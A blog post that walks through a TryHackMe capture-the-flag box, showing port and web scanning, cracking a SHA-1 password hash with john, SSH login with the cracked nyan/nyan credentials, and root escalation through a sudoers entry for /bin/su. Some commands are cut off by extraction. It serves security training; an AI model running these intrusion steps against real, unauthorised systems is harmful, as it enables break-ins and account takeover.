Kamil Gierach-Pacanek
CyberEthical.Me: Hacking for the Security Awareness

CyberEthical.Me: Hacking for the Security Awareness

THM: Crash Course Pen Testing

THM: Crash Course Pen Testing

Write-up for final challenge at CC: Pen Testing room at TryHackMe

Kamil Gierach-Pacanek's photo
Kamil Gierach-Pacanek

Published on Sep 13, 2021

3 min read

Subscribe to my newsletter and never miss my upcoming articles

Basic Information

TypeRegular Box
NameTry Hack Me / CC: Pen Testing
AuthorAsentinn / OkabeRintaro


  1. Basic Information
  2. Recon
  3. Cracking user password
  4. Elevating privileges
  5. Additional readings

πŸ”” CyberEthical.Me is maintained purely from your donations - consider one-time sponsoring with the Sponsor button or 🎁 become a Patron which also gives you some bonus perks.
Join our Discord Server!


Target IP is - I'm assigning that to the variable for ease of use.

$ IP=

Scanning for open ports

$ nmap -sC -sV -p- $IP -oN nmap-$IP.out


And prepare input for the searchsploit

$ nmap -sC -sV -p 22,80 $IP -oX nmap-$IP.xml
$ searchsploit --nmap nmap-


Firing up nikto and fuff for practice

$ nikto -h $IP -o nikto-$IP.txt


$ ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://$IP/FUZZ -recursion -recursion-depth 1 -e .txt,.php -v -of md -o fuzz-$IP.md

ffuf command can be a little complicated, so let me explain it a bit

  • -w: wordlist for fuzzing
  • -u: target URL
  • -recursion, -recursion-depth: when fuff finds a directory, it starts another scan after the current finished (you will recognize it by Job [1/X] label)
  • -e: useful one, simultaneously tries to look for files with listed extensions - be careful with this one though, as it multiplies the amount of work by N where N is a number of extensions (because for each wordlist entry it tries appending these extensions).
  • -v: shows full URL of the findings (useful when using -recursion flag)
  • -of: output format, ffuf output files are not the easiest one to read, but and I choose the Markdown for now
  • -o: and this is just a name for the output file; $IP will resolve variable name and the result


Back to top ‴

Cracking user password

Both find out the /secret/ directory and fuff further tracked the /secret/secret.txt.

$ curl


Which definitely is the hash of user password. I will be using john to crack it, and it could be run blindly on that file, but lets use the hash-identifier that comes with Kali to see the output just out of curiosity.

$ hash-identifier 046385855FC9580393853D8E81F240B66FE9A7B8


As we can see it is the SHA-1 hash. Now cracking it with john:

$ john -format=Raw-SHA1 secret.txt


Which was really fast (don't ever use such weak passwords, of course). So we've got credentials nyan/nyan. Try logging with these on the SSH.

$ ssh nyan@$IP


Were in. I'm getting the user flag.

nyan@ubuntu:~$ cat user.txt

Back to top ‴

Elevating privileges


User nyan can run /bin/su as a root without specifying its password

And just by seeing this sudoer entry we know that nyan is a can execute sudo command.

Otherwise when running sudo -l we would see Sorry, user nyan may not run sudo on ubuntu (where ubuntu is the host name)

We got the root! So cat out that flag and complete the box.

root@ubuntu:/home/nyan# cat /root/root.txt

Additional readings

πŸ“Œ Follow the #CyberEthical hashtag on the social media
🎁 Become a Patron and gain additional benefits
πŸ‘Ύ Join CyberEthical Discord server
πŸ‘‰ Instagram: @cyber.ethical.me
πŸ‘‰ LinkedIn: Kamil Gierach-Pacanek
πŸ‘‰ Twitter: @cyberethical_me
πŸ‘‰ Facebook: @CyberEthicalMe

Back to top ‴

Did you find this article valuable?

Support Kamil Gierach-Pacanek by becoming a sponsor. Any amount is appreciated!

See recent sponsors |Β Learn more about Hashnode Sponsors
Share this